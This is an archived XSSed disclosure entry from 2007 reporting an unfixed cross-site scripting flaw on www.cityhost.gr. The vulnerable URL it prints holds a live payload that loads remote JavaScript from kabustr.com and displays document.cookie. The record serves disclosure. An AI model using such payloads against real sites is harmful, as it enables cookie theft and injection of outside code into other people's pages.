Unfixed XSS vulnerability at www.cityhost.gr

2007-04-16T00:00:00
ID XSSED:6272
Type xssed
Reporter KaBuS
Modified 2007-04-16T00:00:00

Description

Security researcher KaBuS, has submitted on 16/04/2007 a cross-site-scripting (XSS) vulnerability affecting www.cityhost.gr, which at the time of submission ranked 2874495 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 16/04/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.cityhost.gr/support/index.php?<script%20language="Javascript"%20src="http://kabustr.com/chat/c.js"%20type="text/javascript">KaBuS-KabusTr.coM-KaBuS-KabusTr.coM</script><script>alert(document.cookie);</script><script>alert(/KaBuS/);</script>